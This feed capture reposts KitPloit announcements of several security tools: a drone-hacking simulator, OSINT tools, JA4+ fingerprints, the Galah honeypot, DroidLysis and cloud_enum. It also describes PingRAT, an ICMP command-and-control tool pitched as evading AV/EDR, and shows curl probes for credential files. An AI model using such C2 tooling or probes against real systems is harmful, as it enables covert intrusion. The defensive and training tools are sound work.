FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayKitPloit - PenTest Tools!

Damn-Vulnerable-Drone - An Intentionally Vulnerable Drone Hacking Simulator Based On The Popular ArduPilot/MAVLink Architecture, Providing A Realistic Environment For Hands-On Drone Hacking

By: Zion3R


The Damn Vulnerable Drone is an intentionally vulnerable drone hacking simulator based on the popular ArduPilot/MAVLink architecture, providing a realistic environment for hands-on drone hacking.


    About the Damn Vulnerable Drone


    What is the Damn Vulnerable Drone?

    The Damn Vulnerable Drone is a virtually simulated environment designed for offensive security professionals to safely learn and practice drone hacking techniques. It simulates real-world ArduPilot & MAVLink drone architectures and vulnerabilities, offering a hands-on experience in exploiting drone systems.

    Why was it built?

    The Damn Vulnerable Drone aims to enhance offensive security skills within a controlled environment, making it an invaluable tool for intermediate-level security professionals, pentesters, and hacking enthusiasts.

    Similar to how pilots utilize flight simulators for training, we can use the Damn Vulnerable Drone simulator to gain in-depth knowledge of real-world drone systems, understand their vulnerabilities, and learn effective methods to exploit them.

    The Damn Vulnerable Drone platform is open-source and available at no cost and was specifically designed to address the substantial expenses often linked with drone hardware, hacking tools, and maintenance. Its cost-free nature allows users to immerse themselves in drone hacking without financial concerns. This accessibility makes the Damn Vulnerable Drone a crucial resource for those in the fields of information security and penetration testing, promoting the development of offensive cybersecurity skills in a safe environment.

    How does it work?

    The Damn Vulnerable Drone platform operates on the principle of Software-in-the-Loop (SITL), a simulation technique that allows users to run drone software as if it were executing on an actual drone, thereby replicating authentic drone behaviors and responses.

    ArduPilot's SITL allows for the execution of the drone's firmware within a virtual environment, mimicking the behavior of a real drone without the need for physical hardware. This simulation is further enhanced with Gazebo, a dynamic 3D robotics simulator, which provides a realistic environment and physics engine for the drone to interact with. Together, ArduPilot's SITL and Gazebo lay the foundation for a sophisticated and authentic drone simulation experience.

    While the current Damn Vulnerable Drone setup doesn't mirror every drone architecture or configuration, the integrated tactics, techniques and scenarios are broadly applicable across various drone systems, models and communication protocols.

    Features

    • Docker-based Environment: Runs in a completely virtualized docker-based setup, making it accessible and safe for drone hacking experimentation.
    • Simulated Wireless Networking: Simulated Wifi (802.11) interfaces to practice wireless drone attacks.
    • Onboard Camera Streaming & Gimbal: Simulated RTSP drone onboard camera stream with gimbal and companion computer integration.
    • Companion Computer Web Interface: Companion Computer configuration management via web interface and simulated serial connection to Flight Controller.
    • QGroundControl/MAVProxy Integration: One-click QGroundControl UI launching (only supported on x86 architecture) with MAVProxy GCS integration.
    • MAVLink Router Integration: Telemetry forwarding via MAVLink Router on the Companion Computer Web Interface.
    • Dynamic Flight Logging: Fully dynamic Ardupilot flight bin logs stored on a simulated SD Card.
    • Management Web Console: Simple to use simulator management web console used to trigger scenarios and drone flight states.
    • Comprehensive Hacking Scenarios: Ideal for practicing a wide range of drone hacking techniques, from basic reconnaissance to advanced exploitation.
    • Detailed Walkthroughs: If you need help hacking against a particular scenario you can leverage the detailed walkthrough documentation as a spoiler.


    PIP-INTEL - OSINT and Cyber Intelligence Tool

    By: Zion3R

     


    Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface simplifying the data collection and analysis processes for researchers and cybersecurity professionals.

    Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.




    JA4+ - Suite Of Network Fingerprinting Standards

    By: Zion3R


    JA4+ is a suite of network Fingerprinting methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.

    Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
    JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
    JA4T: TCP Fingerprinting (JA4T/TS/TScan)


    To understand how to read JA4+ fingerprints, see Technical Details

    This repo includes JA4+ Python, Rust, Zeek and C, as a Wireshark plugin.

    JA4/JA4+ support is being added to:
    GreyNoise
    Hunt
    Driftnet
    DarkSail
    Arkime
    GoLang (JA4X)
    Suricata
    Wireshark
    Zeek
    nzyme
    Netresec's CapLoader
    NetworkMiner">Netresec's NetworkMiner
    NGINX
    F5 BIG-IP
    nfdump
    ntop's ntopng
    ntop's nDPI
    Team Cymru
    NetQuest
    Censys
    Exploit.org's Netryx
    cloudflare.com/bots/concepts/ja3-ja4-fingerprint/">Cloudflare
    fastly
    with more to be announced...

    Examples

    Application JA4+ Fingerprints
    Chrome JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP)
    JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC)
    JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key)
    JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key)
    IcedID Malware Dropper JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982
    IcedID Malware JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8
    JA4S=t120300_c030_5e2616a54c73
    Sliver Malware JA4=t13d190900_9dc949149365_97f8aa674fd9
    JA4S=t130200_1301_a56c5b993250
    JA4X=000000000000_4f24da86fad6_bf0f0589fc03
    JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
    Cobalt Strike JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd
    JA4X=2166164053c1_2166164053c1_30d204a01551
    SoftEther VPN JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client)
    JA4S=t130200_1302_a56c5b993250
    JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
    Qakbot JA4X=2bab15409345_af684594efb4_000000000000
    Pikabot JA4X=1a59268f55e5_1a59268f55e5_795797892f9c
    Darkgate JA4H=po10nn060000_cdb958d032b0
    LummaC2 JA4H=po11nn050000_d253db9d024b
    Evilginx JA4=t13d191000_9dc949149365_e7c285222651
    Reverse SSH Shell JA4SSH=c76s76_c71s59_c0s70
    Windows 10 JA4T=64240_2-1-3-1-1-4_1460_8
    Epson Printer JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16

    For more, see ja4plus-mapping.csv
    The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.

    Plugins

    Wireshark
    Zeek
    Arkime

    Binaries

    Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark

    Download the latest JA4 binaries from: Releases.

    JA4+ on Ubuntu

    sudo apt install tshark
    ./ja4 [options] [pcap]

    JA4+ on Mac

    1) Install Wireshark https://www.wireshark.org/download.html which will install tshark 2) Add tshark to $PATH

    ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
    ./ja4 [options] [pcap]

    JA4+ on Windows

    1) Install Wireshark for Windows from https://www.wireshark.org/download.html which will install tshark.exe
    tshark.exe is at the location where wireshark is installed, for example: C:\Program Files\Wireshark\thsark.exe
    2) Add the location of tshark to your "PATH" environment variable in Windows.
    (System properties > Environment Variables... > Edit Path)
    3) Open cmd, navigate the ja4 folder

    ja4 [options] [pcap]

    Database

    An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.

    In the meantime, see ja4plus-mapping.csv

    Feel free to do a pull request with any JA4+ data you find.

    JA4+ Details

    JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.

    All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.

    For example; GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints but with JA4, only the b part of the JA4 fingerprint changes, parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).

    Current methods and implementation details:
    | Full Name | Short Name | Description | |---|---|---| | JA4 | JA4 | TLS Client Fingerprinting
    | JA4Server | JA4S | TLS Server Response / Session Fingerprinting | JA4HTTP | JA4H | HTTP Client Fingerprinting | JA4Latency | JA4L | Latency Measurment / Light Distance | JA4X509 | JA4X | X509 TLS Certificate Fingerprinting | JA4SSH | JA4SSH | SSH Traffic Fingerprinting | JA4TCP | JA4T | TCP Client Fingerprinting | JA4TCPServer | JA4TS | TCP Server Response Fingerprinting | JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner

    The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...

    To understand how to read JA4+ fingerprints, see Technical Details

    Licensing

    JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.

    JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.

    All JA4+ methods are patent pending.
    JA4+ is a trademark of FoxIO

    JA4+ can and is being implemented into open source tools, see the License FAQ for details.

    This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.

    ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.

    Q&A

    Q: Why are you sorting the ciphers? Doesn't the ordering matter?
    A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.

    Q: Why are you sorting the extensions?
    A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.

    So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.

    Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
    A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions and even though TLS1.3 only supports a few ciphers, browsers and applications still support many more.

    JA4+ was created by:

    John Althouse, with feedback from:

    Josh Atkins
    Jeff Atkinson
    Joshua Alexander
    W.
    Joe Martin
    Ben Higgins
    Andrew Morris
    Chris Ueland
    Ben Schofield
    Matthias Vallentin
    Valeriy Vorotyntsev
    Timothy Noel
    Gary Lipsky
    And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.

    Contact John Althouse at john@foxio.io for licensing and questions.

    Copyright (c) 2024, FoxIO



    PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads

    By: Zion3R


    PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.

    Features:

    • Uses ICMP for Command and Control
    • Undetectable by most AV/EDR solutions
    • Written in Go

    Installation:

    Download the binaries

    or build the binaries and you are ready to go:

    $ git clone https://github.com/Nemesis0U/PingRAT.git
    $ go build client.go
    $ go build server.go

    Usage:

    Server:

    ./server -h
    Usage of ./server:
    -d string
    Destination IP address
    -i string
    Listener (virtual) Network Interface (e.g. eth0)

    Client:

    ./client -h
    Usage of ./client:
    -d string
    Destination IP address
    -i string
    (Virtual) Network Interface (e.g., eth0)



    Galah - An LLM-powered Web Honeypot Using The OpenAI API

    By: Zion3R


    TL;DR: Galah (/ɡəˈlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


    Description

    Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

    I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

    The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

    Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

    Future Enhancements

    • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

    • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

    • Support for Other LLMs.

    Getting Started

    • Ensure you have Go version 1.20+ installed.
    • Create an OpenAI API key from here.
    • If you want to serve over HTTPS, generate TLS certificates.
    • Clone the repo and install the dependencies.
    • Update the config.yaml file.
    • Build and run the Go binary!
    % git clone git@github.com:0x4D31/galah.git
    % cd galah
    % go mod download
    % go build
    % ./galah -i en0 -v

    ██████ █████ ██ █████ ██ ██
    ██ ██ ██ ██ ██ ██ ██ ██
    ██ ███ ███████ ██ ███████ ███████
    ██ ██ ██ ██ ██ ██ ██ ██ ██
    ██████ ██ ██ ███████ ██ ██ ██ ██
    llm-based web honeypot // version 1.0
    author: Adel "0x4D31" Karimi

    2024/01/01 04:29:10 Starting HTTP server on port 8080
    2024/01/01 04:29:10 Starting HTTP server on port 8888
    2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
    2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

    2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
    2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
    2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
    2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

    ^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
    2024/01/01 04:39:27 All servers shut down gracefully.

    Example Responses

    Here are some example responses:

    Example 1

    % curl http://localhost:8080/login.php
    <!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

    JSON log record:

    {"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

    Example 2

    % curl http://localhost:8080/.aws/credentials
    [default]
    aws_access_key_id = AKIAIOSFODNN7EXAMPLE
    aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    region = us-west-2

    JSON log record:

    {"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

    Okay, that was impressive!

    Example 3

    Now, let's do some sort of adversarial testing!

    % curl http://localhost:8888/are-you-a-honeypot
    No, I am a server.`

    JSON log record:

    {"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

    😑

    % curl http://localhost:8888/i-mean-are-you-a-fake-server`
    No, I am not a fake server.

    JSON log record:

    {"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

    You're a galah, mate!



    DroidLysis - Property Extractor For Android Apps

    By: Zion3R


    DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.

    DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.


    Installing DroidLysis

    1. Install required system packages
    sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
    1. Install Android disassembly tools

    2. Apktool ,

    3. Baksmali, and optionally
    4. Dex2jar and
    5. Obsolete: Procyon (note that Procyon only works with Java 8, not Java 11).
    $ mkdir -p ~/softs
    $ cd ~/softs
    $ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
    $ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
    $ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
    $ unzip dex-tools-v2.4.zip
    $ rm -f dex-tools-v2.4.zip
    1. Get DroidLysis from the Git repository (preferred) or from pip

    Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments etc).

    $ python3 -m venv venv
    $ source ./venv/bin/activate
    (venv) $ pip3 install git+https://github.com/cryptax/droidlysis

    Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis).

    1. Configure conf/general.conf. In particular make sure to change /home/axelle with your appropriate directories.
    [tools]
    apktool = /home/axelle/softs/apktool_2.9.3.jar
    baksmali = /home/axelle/softs/baksmali-2.5.2.jar
    dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
    procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
    keytool = /usr/bin/keytool
    ...
    1. Run it:
    python3 ./droidlysis3.py --help

    Configuration

    The configuration file is ./conf/general.conf (you can switch to another file with the --config option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf, ./conf/wide.conf, ./conf/arm.conf, ./conf/kit.conf) and the name of the database file (only used if you specify --enable-sql)

    Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.

    Usage

    DroidLysis uses Python 3. To launch it and get options:

    droidlysis --help

    For example, test it on Signal's APK:

    droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf

    DroidLysis outputs:

    • A summary on the console (see image above)
    • The unzipped, pre-processed sample in a subdirectory of your output dir. The subdirectory is named using the sample's filename and sha256 sum. For example, if we analyze the Signal application and set --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
    • A database (by default, SQLite droidlysis.db) containing properties it noticed.

    Options

    Get usage with droidlysis --help

    • The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other type of files (unless there is a bug...) but won't be able to understand the content.

    • When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput. If you want to store all statistics in a SQL database, use --enable-sql (see here)

    • DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon.

    • DroidLysis's analysis does not inspect known 3rd party SDK by default, i.e. for instance it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisment) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).

    Sample output directory (--output DIR)

    This directory contains (when applicable):

    • A readable AndroidManifest.xml
    • Readable resources in res
    • Libraries lib, assets assets
    • Disassembled Smali code: smali (and others)
    • Package meta information: META-INF
    • Package contents when simply unzipped in ./unzipped
    • DEX executable classes.dex (and others), and converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred

    The following files are generated by DroidLysis:

    • autoanalysis.md: lists each pattern DroidLysis detected and where.
    • report.md: same as what was printed on the console

    If you do not need the sample output directory to be generated, use the option --clearoutput.

    Import trackers from Exodus etc (--import-exodus)

    $ python3 ./droidlysis3.py --import-exodus --verbose
    Processing file: ./droidurl.pyc ...
    DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
    DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
    DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
    DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
    DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
    DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
    DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
    DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf

    Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the 2 files and check what trackers you wish to add.

    SQLite database{#sqlite_database}

    If you want to process a directory of samples, you'll probably like to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql. This will automatically dump all results in a database named droidlysis.db, in a table named samples. Each entry in the table is relative to a given sample. Each column is properties DroidLysis tracks.

    For example, to retrieve all filename, SHA256 sum and smali properties of the database:

    sqlite> select sha256, sanitized_basename, smali_properties from samples;
    f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
    ...

    Property patterns

    What DroidLysis detects can be configured and extended in the files of the ./conf directory.

    A pattern consist of:

    • a tag name: example send_sms. This is to name the property. Must be unique across the .conf file.
    • a pattern: this is a regexp to be matched. Ex: ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is match on Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
    • a description (optional): explains the importance of the property and what it means.
    [send_sms]
    pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
    description=Sending SMS messages

    Importing Exodus Privacy Trackers

    Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf. Add option --import_exodus to the droidlysis command line: this will parse existing trackers Exodus Privacy knows and which aren't yet in your kit.conf. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf.

    Afterwards, you may want to sort your kit.conf file:

    import configparser
    import collections
    import os

    config = configparser.ConfigParser({}, collections.OrderedDict)
    config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
    # Order all sections alphabetically
    config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
    with open('sorted.conf','w') as f:
    config.write(f)

    Updates

    • v3.4.6 - Detecting manifest feature that automatically loads APK at install
    • v3.4.5 - Creating a writable user kit.conf file
    • v3.4.4 - Bug fix #14
    • v3.4.3 - Using configuration files
    • v3.4.2 - Adding import of Exodus Privacy Trackers
    • v3.4.1 - Removed dependency to Androguard
    • v3.4.0 - Multidex support
    • v3.3.1 - Improving detection of Base64 strings
    • v3.3.0 - Dumping data to JSON
    • v3.2.1 - IP address detection
    • v3.2.0 - Dex2jar is optional
    • v3.1.0 - Detection of Base64 strings


    Cloud_Enum - Multi-cloud OSINT Tool. Enumerate Public Resources In AWS, Azure, And Google Cloud

    By: Zion3R


    Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.

    Currently enumerates the following:

    Amazon Web Services: - Open / Protected S3 Buckets - awsapps (WorkMail, WorkDocs, Connect, etc.)

    Microsoft Azure: - Storage Accounts - Open Blob Storage Containers - Hosted Databases - Virtual Machines - Web Apps

    Google Cloud Platform - Open / Protected GCP Buckets - Open / Protected Firebase Realtime Databases - Google App Engine sites - Cloud Functions (enumerates project/regions with existing functions, then brute forces actual function names) - Open Firebase Apps


    See it in action in Codingo's video demo here.


    Usage

    Setup

    Several non-standard libaries are required to support threaded HTTP requests and dns lookups. You'll need to install the requirements as follows:

    pip3 install -r ./requirements.txt

    Running

    The only required argument is at least one keyword. You can use the built-in fuzzing strings, but you will get better results if you supply your own with -m and/or -b.

    You can provide multiple keywords by specifying the -k argument multiple times.

    Keywords are mutated automatically using strings from enum_tools/fuzz.txt or a file you provide with the -m flag. Services that require a second-level of brute forcing (Azure Containers and GCP Functions) will also use fuzz.txt by default or a file you provide with the -b flag.

    Let's say you were researching "somecompany" whose website is "somecompany.io" that makes a product called "blockchaindoohickey". You could run the tool like this:

    ./cloud_enum.py -k somecompany -k somecompany.io -k blockchaindoohickey

    HTTP scraping and DNS lookups use 5 threads each by default. You can try increasing this, but eventually the cloud providers will rate limit you. Here is an example to increase to 10.

    ./cloud_enum.py -k keyword -t 10

    IMPORTANT: Some resources (Azure Containers, GCP Functions) are discovered per-region. To save time scanning, there is a "REGIONS" variable defined in cloudenum/azure_regions.py and cloudenum/gcp_regions.py that is set by default to use only 1 region. You may want to look at these files and edit them to be relevant to your own work.

    Complete Usage Details

    usage: cloud_enum.py [-h] -k KEYWORD [-m MUTATIONS] [-b BRUTE]

    Multi-cloud enumeration utility. All hail OSINT!

    optional arguments:
    -h, --help show this help message and exit
